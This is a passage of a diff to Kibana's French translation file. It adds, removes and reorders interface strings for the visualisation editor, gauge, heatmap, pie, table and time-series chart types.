"visDefaultEditor.controls.ipRanges.fromToButtonLabel": "De/à", - "visDefaultEditor.controls.ipRanges.ipRangeFromAriaLabel": "Début de la plage d’IP : {value}", - "visDefaultEditor.controls.ipRanges.ipRangeToAriaLabel": "Fin de la plage d’IP : {value}", - "visDefaultEditor.controls.ipRanges.removeCidrMaskButtonAriaLabel": "Supprimer la valeur du masque CIDR de {mask}", - "visDefaultEditor.controls.ipRanges.removeEmptyCidrMaskButtonAriaLabel": "Supprimer la valeur par défaut du masque CIDR", - "visDefaultEditor.controls.ipRanges.removeRangeAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.ipRanges.removeEmptyCidrMaskButtonAriaLabel": "Supprimer la valeur par défaut du masque CIDR", "visDefaultEditor.controls.ipRangesAriaLabel": "Plages d’IP", - "visDefaultEditor.controls.jsonInputLabel": "Entrée JSON", - "visDefaultEditor.controls.jsonInputTooltip": "Toutes les propriétés au format JSON ajoutées ici seront fusionnées avec la définition d'agrégation Elasticsearch pour cette section. Par exemple, \"shard_size\" pour une agrégation de termes.", + "visDefaultEditor.controls.jsonInputLabel": "Entrée JSON", + "visDefaultEditor.controls.jsonInputTooltip": "Toutes les propriétés au format JSON ajoutées ici seront fusionnées avec la définition d'agrégation Elasticsearch pour cette section. Par exemple, \"shard_size\" pour une agrégation de termes.", "visDefaultEditor.controls.maxBars.autoPlaceholder": "Auto", - "visDefaultEditor.controls.maxBars.maxBarsHelpText": "Les intervalles seront sélectionnés automatiquement en fonction des données disponibles. 
Le nombre maximal de barres ne peut jamais être supérieur à la valeur {histogramMaxBars} des paramètres avancés.", "visDefaultEditor.controls.maxBars.maxBarsLabel": "Barres max.", "visDefaultEditor.controls.metricLabel": "Indicateur", "visDefaultEditor.controls.metrics.bucketTitle": "Compartiment", "visDefaultEditor.controls.metrics.metricTitle": "Indicateur", "visDefaultEditor.controls.numberInterval.autoInteralIsUsed": "L'intervalle automatique est utilisé.", - "visDefaultEditor.controls.numberInterval.minimumIntervalLabel": "Intervalle minimum", - "visDefaultEditor.controls.numberInterval.minimumIntervalTooltip": "L'intervalle sera scalé automatiquement si la valeur fournie crée plus de compartiments que ce qui est spécifié par la valeur {histogramMaxBars} dans les paramètres avancés.", + "visDefaultEditor.controls.numberInterval.minimumIntervalLabel": "Intervalle minimal", "visDefaultEditor.controls.numberInterval.selectIntervalPlaceholder": "Saisir un intervalle", - "visDefaultEditor.controls.numberList.addUnitButtonLabel": "Ajouter {unitName}", "visDefaultEditor.controls.numberList.duplicateValueErrorMessage": "Dupliquez la valeur.", "visDefaultEditor.controls.numberList.enterValuePlaceholder": "Saisir une valeur", "visDefaultEditor.controls.numberList.invalidAscOrderErrorMessage": "La valeur n'est pas dans l'ordre croissant.", - "visDefaultEditor.controls.numberList.invalidRangeErrorMessage": "La valeur doit être comprise dans la plage allant de {min} à {max}.", - "visDefaultEditor.controls.numberList.removeUnitButtonAriaLabel": "Supprimer la valeur de rang de {value}", "visDefaultEditor.controls.onlyRequestDataAroundMapExtentLabel": "Demander uniquement des données sur l'étendue de la carte", "visDefaultEditor.controls.onlyRequestDataAroundMapExtentTooltip": "Appliquer l'agrégation de filtres geo_bounding_box pour réduire la zone d’intérêt à la zone d'affichage de la carte avec collier", "visDefaultEditor.controls.orderAgg.alphabeticalLabel": 
"Alphabétique", "visDefaultEditor.controls.orderAgg.orderByLabel": "Classer par", "visDefaultEditor.controls.orderLabel": "Ordre", "visDefaultEditor.controls.otherBucket.groupValuesLabel": "Regrouper les autres valeurs dans un compartiment séparé", - "visDefaultEditor.controls.otherBucket.groupValuesTooltip": "Les valeurs qui ne sont pas dans le top N sont regroupées dans ce compartiment. Pour inclure les documents avec des valeurs manquantes, activez l'option \"Afficher les valeurs manquantes\".", + "visDefaultEditor.controls.otherBucket.groupValuesTooltip": "Les valeurs qui ne sont pas dans le top N sont regroupées dans ce compartiment. Pour inclure les documents avec des valeurs manquantes, activez l'option \"Afficher les valeurs manquantes\".", "visDefaultEditor.controls.otherBucket.showMissingValuesLabel": "Afficher les valeurs manquantes", - "visDefaultEditor.controls.otherBucket.showMissingValuesTooltip": "Ne fonctionne que pour les champs de type \"chaîne\". Lorsque cette option est activée, les documents avec des valeurs manquantes sont inclus dans la recherche. Si ce compartiment est dans le top N, il apparaît dans le graphique. S'il n'est pas dans le top N et que l’option \"Regrouper les autres valeurs dans un compartiment séparé\" est activée, Elasticsearch ajoute les valeurs manquantes à \"l'autre\" compartiment.", + "visDefaultEditor.controls.otherBucket.showMissingValuesTooltip": "Ne fonctionne que pour les champs de type \"chaîne\". Lorsque cette option est activée, les documents avec des valeurs manquantes sont inclus dans la recherche. Si ce compartiment est dans le top N, il apparaît dans le graphique. 
S'il n'est pas dans le top N et que l’option \"Regrouper les autres valeurs dans un compartiment séparé\" est activée, Elasticsearch ajoute les valeurs manquantes à \"l'autre\" compartiment.", "visDefaultEditor.controls.percentileRanks.percentUnitNameText": "pour cent", "visDefaultEditor.controls.percentileRanks.valuesLabel": "Valeurs", "visDefaultEditor.controls.percentileRanks.valueUnitNameText": "valeur", 
@@ -6011,28 +5322,23 @@ "visDefaultEditor.controls.ranges.greaterThanOrEqualTooltip": "Supérieur ou égal à", "visDefaultEditor.controls.ranges.lessThanPrepend": "<", "visDefaultEditor.controls.ranges.lessThanTooltip": "Inférieur à", - "visDefaultEditor.controls.ranges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}", - "visDefaultEditor.controls.ranges.toLabel": "Au", + "visDefaultEditor.controls.ranges.toLabel": "À", "visDefaultEditor.controls.rowsLabel": "Lignes", "visDefaultEditor.controls.scaleMetricsLabel": "Scaler les valeurs des indicateurs (déclassé)", "visDefaultEditor.controls.scaleMetricsTooltip": "Si vous sélectionnez un intervalle minimal manuel et qu'un intervalle plus grand est utilisé, l'activation de cette option entraînera le scaling des indicateurs de décompte et de somme à l'intervalle manuel sélectionné.", "visDefaultEditor.controls.showEmptyBucketsLabel": "Afficher les compartiments vides", "visDefaultEditor.controls.showEmptyBucketsTooltip": "Afficher tous les compartiments, pas seulement ceux avec des résultats", "visDefaultEditor.controls.sizeLabel": "Taille", - "visDefaultEditor.controls.sizeTooltip": "Demander les K premiers résultats. Plusieurs résultats seront combinés par le biais de \"agréger avec\".", + "visDefaultEditor.controls.sizeTooltip": "Demander les K premiers résultats. 
Plusieurs résultats seront combinés par le biais de \"agréger avec\".", "visDefaultEditor.controls.sortOnLabel": "Trier en fonction de", "visDefaultEditor.controls.splitByLegend": "Diviser le graphique par lignes ou colonnes.", "visDefaultEditor.controls.timeInterval.createsTooLargeBucketsTooltip": "Cet intervalle crée des compartiments trop grands pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été réduit.", "visDefaultEditor.controls.timeInterval.createsTooManyBucketsTooltip": "Cet intervalle crée trop de compartiments pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été augmenté.", "visDefaultEditor.controls.timeInterval.invalidFormatErrorMessage": "Format d'intervalle non valide.", - "visDefaultEditor.controls.timeInterval.minimumIntervalLabel": "Intervalle minimum", - "visDefaultEditor.controls.timeInterval.scaledHelpText": "Actuellement scalé à {bucketDescription}", + "visDefaultEditor.controls.timeInterval.minimumIntervalLabel": "Intervalle minimal", "visDefaultEditor.controls.timeInterval.selectIntervalPlaceholder": "Choisir un intervalle", - "visDefaultEditor.controls.timeInterval.selectOptionHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", + "visDefaultEditor.controls.timeInterval.selectOptionHelpText": "Choisissez une option ou créez une valeur personnalisée. 
Exemples : 30s, 20m, 24h, 2d, 1w, 1M", "visDefaultEditor.controls.useAutoInterval": "Utiliser l'intervalle automatique", - "visDefaultEditor.editorConfig.dateHistogram.customInterval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", - "visDefaultEditor.editorConfig.histogram.interval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", - "visDefaultEditor.metrics.wrongLastBucketTypeErrorMessage": "La dernière agrégation de compartiments doit être \"Histogramme de date\" ou \"Histogramme\" lorsque vous utilisez l'agrégation d'indicateurs \"{type}\".", "visDefaultEditor.options.colorRanges.errorText": "Chaque plage doit être supérieure à la précédente.", "visDefaultEditor.options.colorSchema.colorSchemaLabel": "Schéma de couleurs", "visDefaultEditor.options.colorSchema.howToChangeColorsDescription": "Les couleurs individuelles peuvent être modifiées dans la légende.", 
@@ -6050,154 +5356,32 @@ "visDefaultEditor.options.percentageMode.documentationLabel": "Documentation Numeral.js", "visDefaultEditor.options.percentageMode.numeralLabel": "Modèle de format", "visDefaultEditor.options.percentageMode.percentageModeLabel": "Mode de pourcentage", - "visDefaultEditor.options.rangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", "visDefaultEditor.options.vislibBasicOptions.legendPositionLabel": "Position de la légende", "visDefaultEditor.options.vislibBasicOptions.showTooltipLabel": "Afficher l'infobulle", "visDefaultEditor.palettePicker.label": "Palette de couleurs", "visDefaultEditor.sidebar.autoApplyChangesLabelOff": "Application automatique désactivée", "visDefaultEditor.sidebar.autoApplyChangesLabelOn": "Application automatique activée", - "visDefaultEditor.sidebar.autoApplyChangesOff": "Off", - "visDefaultEditor.sidebar.autoApplyChangesOffLabel": "Application automatique désactivée", - "visDefaultEditor.sidebar.autoApplyChangesOn": "On", - "visDefaultEditor.sidebar.autoApplyChangesOnLabel": "Application automatique activée", - "visDefaultEditor.sidebar.autoApplyChangesTooltip": "Met automatiquement à jour la visualisation à chaque modification.", - "visDefaultEditor.sidebar.collapseButtonAriaLabel": "Activer/Désactiver la barre latérale", - "visDefaultEditor.sidebar.discardChangesButtonLabel": "Abandonner", - "visDefaultEditor.sidebar.errorButtonTooltip": "Les erreurs dans les champs mis en évidence doivent être corrigées.", - "visDefaultEditor.sidebar.indexPatternAriaLabel": "Modèle d'indexation : {title}", - "visDefaultEditor.sidebar.savedSearch.goToDiscoverButtonText": "Afficher cette recherche dans Discover", - "visDefaultEditor.sidebar.savedSearch.linkButtonAriaLabel": "Lier à la recherche enregistrée. 
Cliquez pour en savoir plus ou rompre le lien.", - "visDefaultEditor.sidebar.savedSearch.popoverHelpText": "Les modifications apportées ultérieurement à cette recherche enregistrée sont reflétées dans la visualisation. Pour désactiver les mises à jour automatiques, supprimez le lien.", - "visDefaultEditor.sidebar.savedSearch.popoverTitle": "Lié à la recherche enregistrée", - "visDefaultEditor.sidebar.savedSearch.titleAriaLabel": "Recherche enregistrée : {title}", - "visDefaultEditor.sidebar.savedSearch.unlinkSavedSearchButtonText": "Supprimer le lien avec la recherche enregistrée", - "visDefaultEditor.sidebar.tabs.dataLabel": "Données", - "visDefaultEditor.sidebar.tabs.optionsLabel": "Options", - "visDefaultEditor.sidebar.updateChartButtonLabel": "Mettre à jour", - "visDefaultEditor.sidebar.updateInfoTooltip": "CTRL + Entrée est le raccourci clavier pour Mettre à jour.", - "visTypeGauge.advancedSettings.visualization.legacyGaugeChartsLibrary.description": "Active la bibliothèque de graphiques héritée pour les graphiques de jauge dans Visualize.", - "visTypeGauge.advancedSettings.visualization.legacyGaugeChartsLibrary.name": "Bibliothèque de graphiques héritée pour les jauges", - "visTypeGauge.controls.gaugeOptions.alignmentLabel": "Alignement", - "visTypeGauge.controls.gaugeOptions.autoExtendRangeLabel": "Étendre automatiquement la plage", - "visTypeGauge.controls.gaugeOptions.extendRangeTooltip": "Étend la plage jusqu'à la valeur maximale de vos données.", - "visTypeGauge.controls.gaugeOptions.extendRangeTooltipNotAvailable": "La nouvelle bibliothèque de graphiques n’est compatible qu’avec les plages étendues. 
Pour la désactiver, veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.controls.gaugeOptions.gaugeTypeLabel": "Type de jauge", - "visTypeGauge.controls.gaugeOptions.labelsTitle": "Étiquettes", - "visTypeGauge.controls.gaugeOptions.rangesTitle": "Plages", - "visTypeGauge.controls.gaugeOptions.showLabelsLabel": "Afficher les étiquettes", - "visTypeGauge.controls.gaugeOptions.showLegendLabel": "Afficher la légende", - "visTypeGauge.controls.gaugeOptions.showLegendNotAvailable": "La légende n’est pas prise en charge avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.controls.gaugeOptions.showOutline": "Afficher le contour", - "visTypeGauge.controls.gaugeOptions.showOutlineNotAvailable": "Le contour n’est pas pris en charge avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.controls.gaugeOptions.showScaleLabel": "Afficher l'échelle", - "visTypeGauge.controls.gaugeOptions.styleTitle": "Style", - "visTypeGauge.controls.gaugeOptions.subTextLabel": "Sous-étiquette", - "visTypeGauge.editors.gauge.alignmentNotAvailable": "l'alignement n’est pas encore pris en charge avec la nouvelle bibliothèque de graphiques. 
Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.gauge.alignmentAutomaticTitle": "Automatique", - "visTypeGauge.gauge.alignmentHorizontalTitle": "Horizontal", - "visTypeGauge.gauge.alignmentVerticalTitle": "Vertical", - "visTypeGauge.gauge.gaugeDescription": "Affichez le statut d'un indicateur.", - "visTypeGauge.gauge.gaugeTitle": "Jauge", - "visTypeGauge.gauge.gaugeTypes.arcText": "Arc", - "visTypeGauge.gauge.gaugeTypes.circleText": "Cercle", - "visTypeGauge.gauge.groupTitle": "Diviser le groupe", - "visTypeGauge.gauge.metricTitle": "Indicateur", - "visTypeGauge.goal.goalDescription": "Suivez la progression d'un indicateur vers un objectif.", - "visTypeGauge.goal.goalTitle": "Objectif", - "visTypeGauge.goal.groupTitle": "Diviser le groupe", - "visTypeGauge.goal.metricTitle": "Indicateur", - "visTypeGauge.splitTitle.tooltip": "l'agrégation de graphique divisé n’est pas encore compatible avec la nouvelle bibliothèque de graphiques. 
Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges afin d'utiliser l'agrégation de graphique divisé.", - "visTypeHeatmap.advancedSettings.visualization.legacyHeatmapChartsLibrary.description": "Active la bibliothèque de graphiques héritée pour les graphiques à carte thermique dans Visualize.", - "visTypeHeatmap.advancedSettings.visualization.legacyHeatmapChartsLibrary.name": "Bibliothèque de graphiques héritée pour les cartes thermiques", - "visTypeHeatmap.controls.heatmapOptions.colorLabel": "Couleur", - "visTypeHeatmap.controls.heatmapOptions.colorScaleLabel": "Échelle de couleurs", - "visTypeHeatmap.controls.heatmapOptions.colorsNumberLabel": "Nombre de couleurs", - "visTypeHeatmap.controls.heatmapOptions.labelsTitle": "Étiquettes", - "visTypeHeatmap.controls.heatmapOptions.overwriteAutomaticColorLabel": "Écraser la couleur automatique", - "visTypeHeatmap.controls.heatmapOptions.rotateLabel": "Faire pivoter", - "visTypeHeatmap.controls.heatmapOptions.scaleToDataBoundsLabel": "Scaler sur les limites de données", - "visTypeHeatmap.controls.heatmapOptions.showLabelsTitle": "Afficher les étiquettes", - "visTypeHeatmap.controls.heatmapOptions.useCustomRangesLabel": "Utiliser les plages personnalisées", - "visTypeHeatmap.editors.heatmap.basicSettingsTitle": "Paramètres de base", - "visTypeHeatmap.editors.heatmap.colorScaleTooltipNotAvailable": "l'échelle de couleurs n’est pas compatible avec la nouvelle bibliothèque de graphiques. 
Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.editors.heatmap.heatmapSettingsTitle": "Paramètres de la carte thermique", - "visTypeHeatmap.editors.heatmap.highlightLabel": "Mettre la plage en surbrillance", - "visTypeHeatmap.editors.heatmap.highlightLabelTooltip": "Met en surbrillance la plage survolée dans le graphique et l'étiquette correspondante dans la légende.", - "visTypeHeatmap.editors.heatmap.highlightLabelTooltipNotAvailable": "La mise en surbrillance de la plage survolée n’est pas encore compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.editors.heatmap.overwriteColorlNotAvailable": "Le remplacement automatique des couleurs n’est pas compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.editors.heatmap.rotateLabelNotAvailable": "La rotation de l'étiquette n’est pas compatible avec la nouvelle bibliothèque de graphiques. 
Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.heatmap.groupTitle": "Axe Y", - "visTypeHeatmap.heatmap.heatmapDescription": "Affichez les valeurs en tant que couleurs dans une matrice.", - "visTypeHeatmap.heatmap.heatmapTitle": "Carte thermique", - "visTypeHeatmap.heatmap.metricTitle": "Valeur", - "visTypeHeatmap.heatmap.segmentTitle": "Axe X", - "visTypeHeatmap.heatmap.splitTitle": "Diviser le graphique", - "visTypeHeatmap.legendPositions.bottomText": "Bas", - "visTypeHeatmap.legendPositions.leftText": "Gauche", - "visTypeHeatmap.legendPositions.rightText": "Droite", - "visTypeHeatmap.legendPositions.topText": "Haut", - "visTypeHeatmap.scaleTypes.linearText": "Linéaire", - "visTypeHeatmap.scaleTypes.logText": "Logarithmique", - "visTypeHeatmap.scaleTypes.squareRootText": "Racine carrée", - "visTypeHeatmap.splitTitle.tooltip": "l'agrégation de graphique divisé n’est pas encore compatible avec la nouvelle bibliothèque de graphiques. 
Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques afin d'utiliser l'agrégation de graphique divisé.", - "visTypeMarkdown.function.font.help": "Paramètres de police.", - "visTypeMarkdown.function.help": "Visualisation Markdown", - "visTypeMarkdown.function.markdown.help": "Markdown à rendre", - "visTypeMarkdown.function.openLinksInNewTab.help": "Ouvre les liens dans un nouvel onglet", - "visTypeMarkdown.markdownDescription": "Ajoutez du texte et des images à votre tableau de bord.", - "visTypeMarkdown.markdownTitleInWizard": "Texte", - "visTypeMarkdown.params.fontSizeLabel": "Taille de police de base en points", - "visTypeMarkdown.params.helpLinkLabel": "Aide", - "visTypeMarkdown.params.openLinksLabel": "Ouvrir les liens dans un nouvel onglet", - "visTypeMarkdown.tabs.dataText": "Données", - "visTypeMarkdown.tabs.optionsText": "Options", - "visTypeMetric.colorModes.backgroundOptionLabel": "Arrière-plan", - "visTypeMetric.colorModes.labelsOptionLabel": "Étiquettes", - "visTypeMetric.colorModes.noneOptionLabel": "Aucun", - "visTypeMetric.metricDescription": "Affiche un calcul sous la forme d'un nombre unique.", - "visTypeMetric.metricTitle": "Indicateur", - "visTypeMetric.params.color.useForLabel": "Utiliser la couleur pour", - "visTypeMetric.params.rangesTitle": "Plages", - "visTypeMetric.params.settingsTitle": "Paramètres", - "visTypeMetric.params.showTitleLabel": "Afficher le titre", - "visTypeMetric.params.style.fontSizeLabel": "Taille de police de l'indicateur en points", - "visTypeMetric.params.style.styleTitle": "Style", - "visTypeMetric.schemas.metricTitle": "Indicateur", - "visTypeMetric.schemas.splitGroupTitle": "Diviser le groupe", - "visTypePie.advancedSettings.visualization.legacyPieChartsLibrary.deprecation": "La bibliothèque de graphiques héritée pour les camemberts dans Visualize est déclassée et ne sera plus compatible dans une prochaine version.", - 
"visTypePie.advancedSettings.visualization.legacyPieChartsLibrary.description": "Active la bibliothèque de graphiques héritée pour les camemberts dans Visualize.", - "visTypePie.advancedSettings.visualization.legacyPieChartsLibrary.name": "Bibliothèque de graphiques héritée pour les camemberts", - "visTypePie.controls.truncateLabel": "Tronquer", - "visTypePie.controls.truncateTooltip": "Nombre de caractères pour les étiquettes positionnées en dehors du graphique.", - "visTypePie.editors.pie.decimalSliderLabel": "Nombre maximal de décimales pour les pourcentages", - "visTypePie.editors.pie.distinctColorsLabel": "Utiliser des couleurs distinctes pour chaque section", - "visTypePie.editors.pie.donutLabel": "Graphique en anneau", - "visTypePie.editors.pie.emptySizeRatioLabel": "Taille de la zone intérieure", - "visTypePie.editors.pie.labelPositionLabel": "Position de l'étiquette", - "visTypePie.editors.pie.labelsSettingsTitle": "Paramètres des étiquettes", - "visTypePie.editors.pie.legendDisplayLabel": "Afficher la légende", - "visTypePie.editors.pie.nestedLegendLabel": "Imbriquer la légende", - "visTypePie.editors.pie.pieSettingsTitle": "Paramètres du camembert", - "visTypePie.editors.pie.showLabelsLabel": "Afficher les étiquettes", - "visTypePie.editors.pie.showTopLevelOnlyLabel": "Afficher uniquement le niveau supérieur", - "visTypePie.editors.pie.showValuesLabel": "Afficher les valeurs", - "visTypePie.editors.pie.valueFormatsLabel": "Valeurs", - "visTypePie.emptySizeRatioOptions.large": "Large", - "visTypePie.emptySizeRatioOptions.medium": "Moyenne", - "visTypePie.emptySizeRatioOptions.small": "Petite", - "visTypePie.labelPositions.insideOrOutsideText": "Intérieur ou extérieur", - "visTypePie.labelPositions.insideText": "Intérieur", - "visTypePie.legendPositions.bottomText": "Bas", - "visTypePie.legendPositions.leftText": "Gauche", - "visTypePie.legendPositions.rightText": "Droite", - "visTypePie.legendPositions.topText": "Haut", - "visTypePie.pie.metricTitle": 
"Taille de section", - "visTypePie.pie.pieDescription": "Comparez des données proportionnellement à un ensemble.", - "visTypePie.pie.pieTitle": "Camembert", - "visTypePie.pie.segmentTitle": "Diviser les sections", - "visTypePie.pie.splitTitle": "Diviser le graphique", - "visTypePie.valuesFormats.percent": "Afficher le pourcentage", - "visTypePie.valuesFormats.value": "Afficher la valeur", + "visDefaultEditor.sidebar.autoApplyChangesOff": "Off", + "visDefaultEditor.sidebar.autoApplyChangesOffLabel": "Application automatique désactivée", + "visDefaultEditor.sidebar.autoApplyChangesOn": "On", + "visDefaultEditor.sidebar.autoApplyChangesOnLabel": "Application automatique activée", + "visDefaultEditor.sidebar.autoApplyChangesTooltip": "Met automatiquement à jour la visualisation à chaque modification.", + "visDefaultEditor.sidebar.collapseButtonAriaLabel": "Activer/Désactiver la barre latérale", + "visDefaultEditor.sidebar.discardChangesButtonLabel": "Abandonner", + "visDefaultEditor.sidebar.errorButtonTooltip": "Les erreurs dans les champs mis en évidence doivent être corrigées.", + "visDefaultEditor.sidebar.savedSearch.goToDiscoverButtonText": "Afficher cette recherche dans Discover", + "visDefaultEditor.sidebar.savedSearch.linkButtonAriaLabel": "Lier à la recherche enregistrée. Cliquez pour en savoir plus ou rompre le lien.", + "visDefaultEditor.sidebar.savedSearch.popoverHelpText": "Les modifications apportées ultérieurement à cette recherche enregistrée sont reflétées dans la visualisation. 
Pour désactiver les mises à jour automatiques, supprimez le lien.", + "visDefaultEditor.sidebar.savedSearch.popoverTitle": "Lié à la recherche enregistrée", + "visDefaultEditor.sidebar.savedSearch.unlinkSavedSearchButtonText": "Supprimer le lien avec la recherche enregistrée", + "visDefaultEditor.sidebar.tabs.dataLabel": "Données", + "visDefaultEditor.sidebar.tabs.optionsLabel": "Options", + "visDefaultEditor.sidebar.updateChartButtonLabel": "Mettre à jour", + "visDefaultEditor.sidebar.updateInfoTooltip": "CTRL + Entrée est le raccourci clavier pour Mettre à jour.", + "visTypeTable.params.percentageTableColumnName": "Pourcentages de {title}", + "visTypeTable.tableCellFilter.filterForValueAriaLabel": "Filtrer sur la valeur : {cellContent}", + "visTypeTable.tableCellFilter.filterOutValueAriaLabel": "Exclure la valeur : {cellContent}", + "visTypeTable.vis.controls.exportButtonAriaLabel": "Exporter {dataGridAriaLabel} au format CSV", "visTypeTable.defaultAriaLabel": "Visualisation du tableau de données", "visTypeTable.function.adimension.buckets": "Compartiments", "visTypeTable.function.args.bucketsHelpText": "Configuration des dimensions de compartiment", 
@@ -6209,8 +5393,8 @@ "visTypeTable.function.args.showTotalHelpText": "Définir sur \"vrai\" pour afficher le nombre total de lignes", "visTypeTable.function.args.splitColumnHelpText": "Diviser par la configuration des dimensions de colonne", "visTypeTable.function.args.splitRowHelpText": "Diviser par la configuration des dimensions de ligne", - "visTypeTable.function.args.titleHelpText": "Titre de la visualisation. Le titre est utilisé comme nom de fichier par défaut pour l'exportation CSV.", - "visTypeTable.function.args.totalFuncHelpText": "Spécifie la fonction de calcul du nombre total de lignes. Les options possibles sont : ", + "visTypeTable.function.args.titleHelpText": "Titre de la visualisation. Le titre est utilisé comme nom de fichier par défaut pour l'exportation CSV.", + "visTypeTable.function.args.totalFuncHelpText": "Spécifie la fonction de calcul du nombre total de lignes. Les options possibles sont : ", "visTypeTable.function.dimension.metrics": "Indicateurs", "visTypeTable.function.dimension.splitColumn": "Diviser par colonne", "visTypeTable.function.dimension.splitRow": "Diviser par ligne", @@ -6218,7 +5402,6 @@ "visTypeTable.params.autoFitRow": "Ajuster automatiquement les lignes au contenu", "visTypeTable.params.defaultPercentageCol": "Ne pas afficher", "visTypeTable.params.PercentageColLabel": "Colonne de pourcentage", - "visTypeTable.params.percentageTableColumnName": "Pourcentages de {title}", "visTypeTable.params.perPageLabel": "Nombre max. de lignes par page", "visTypeTable.params.showMetricsLabel": "Afficher les indicateurs pour chaque compartiment/niveau", "visTypeTable.params.showPartialRowsLabel": "Afficher les lignes partielles", 
@@ -6228,9 +5411,7 @@ "visTypeTable.params.totalFunctionLabel": "Fonction de total", "visTypeTable.sort.ascLabel": "Tri croissant", "visTypeTable.sort.descLabel": "Tri décroissant", - "visTypeTable.tableCellFilter.filterForValueAriaLabel": "Filtrer sur la valeur : {cellContent}", "visTypeTable.tableCellFilter.filterForValueText": "Filtrer sur la valeur", - "visTypeTable.tableCellFilter.filterOutValueAriaLabel": "Exclure la valeur : {cellContent}", "visTypeTable.tableCellFilter.filterOutValueText": "Exclure la valeur", "visTypeTable.tableVisDescription": "Affichez des données en lignes et en colonnes.", "visTypeTable.tableVisEditorConfig.schemas.bucketTitle": "Diviser les lignes", 
@@ -6242,25 +5423,58 @@ "visTypeTable.totalAggregations.maxText": "Max.", "visTypeTable.totalAggregations.minText": "Min.", "visTypeTable.totalAggregations.sumText": "Somme", - "visTypeTable.vis.controls.exportButtonAriaLabel": "Exporter {dataGridAriaLabel} au format CSV", - "visTypeTable.vis.controls.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", + "visTypeTable.vis.controls.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", "visTypeTable.vis.controls.exportButtonLabel": "Exporter", "visTypeTable.vis.controls.formattedCSVButtonLabel": "Formaté", "visTypeTable.vis.controls.rawCSVButtonLabel": "Brut", - "visTypeTagCloud.orientations.multipleText": "Multiple", - "visTypeTagCloud.orientations.rightAngledText": "Angle droit", - "visTypeTagCloud.orientations.singleText": "Unique", - "visTypeTagCloud.scales.linearText": "Linéaire", - "visTypeTagCloud.scales.logText": "Logarithmique", - "visTypeTagCloud.scales.squareRootText": "Racine carrée", - "visTypeTagCloud.vis.schemas.metricTitle": "Taille de balise", - "visTypeTagCloud.vis.schemas.segmentTitle": "Balises", - "visTypeTagCloud.vis.tagCloudDescription": "Affichez la fréquence des mots avec la taille de police.", - "visTypeTagCloud.vis.tagCloudTitle": "Nuage de balises", - "visTypeTagCloud.visParams.fontSizeLabel": "Plage de taille de police en pixels", - "visTypeTagCloud.visParams.orientationsLabel": "Orientations", - "visTypeTagCloud.visParams.showLabelToggleLabel": "Afficher l'étiquette", - "visTypeTagCloud.visParams.textScaleLabel": "Échelle de texte", + "visTypeTimeseries.advancedSettings.allowStringIndicesText": "Vous permet d'interroger les index Elasticsearch dans les visualisations TSVB.", + "visTypeTimeseries.agg.aggIsNotSupportedDescription": "L'agrégation {modelType} n'est plus prise en 
charge.", + "visTypeTimeseries.agg.aggIsUnsupportedForPanelConfigDescription": "l'agrégation {modelType} n’est pas compatible pour la configuration de panneau existante.", + "visTypeTimeseries.annotationRequest.label": "Annotation : {id}", + "visTypeTimeseries.annotationsEditor.rowTemplateHelpText": "eg.{rowTemplateExample}", + "visTypeTimeseries.axisLabelOptions.axisLabel": "par {unitValue} {unitString}", + "visTypeTimeseries.calculateLabel.metricTypeOfMetricFieldRankLabel": "{metricTypeLabel} de {metricField}", + "visTypeTimeseries.calculateLabel.metricTypeOfTargetLabel": "{metricTypeLabel} de {targetLabel}", + "visTypeTimeseries.calculateLabel.metricTypeOfTargetWithAdditionalLabel": "{metricTypeLabel} de {targetLabel} ({additionalLabel})", + "visTypeTimeseries.calculateLabel.positiveRateLabel": "Taux de compteur de {field}", + "visTypeTimeseries.calculateLabel.seriesAggLabel": "Agrégation de séries ({metricFunction})", + "visTypeTimeseries.calculateLabel.staticValueLabel": "Valeur statique de {metricValue}", + "visTypeTimeseries.calculation.painlessScriptDescription": "Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. 
Pour accéder à l'intervalle de compartiment (en millisecondes), utilisez {paramsInterval}.", + "visTypeTimeseries.colorPicker.notAccessibleWithValueAriaLabel": "Sélecteur de couleur ({value}), non accessible", + "visTypeTimeseries.colorRules.setPrimaryColorLabel": "Définissez {primaryName} sur", + "visTypeTimeseries.colorRules.setSecondaryColorLabel": "et {secondaryName} sur", + "visTypeTimeseries.dataFormatPicker.formatPatternLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})", + "visTypeTimeseries.errors.dataViewNotFoundError": "Impossible de trouver la vue de données : {dataViewId}", + "visTypeTimeseries.errors.fieldNotFound": "Champ \"{field}\" introuvable", + "visTypeTimeseries.externalUrlErrorModal.bodyMessage": "Configurez {externalUrlPolicy} dans votre {kibanaConfigFileName} pour autoriser l'accès à {url}.", + "visTypeTimeseries.fieldSelect.fieldIsNotValid": "La sélection \"{fieldParameter}\" n'est pas valide pour une utilisation avec l'index actuel.", + "visTypeTimeseries.fieldUtils.multiFieldLabel": 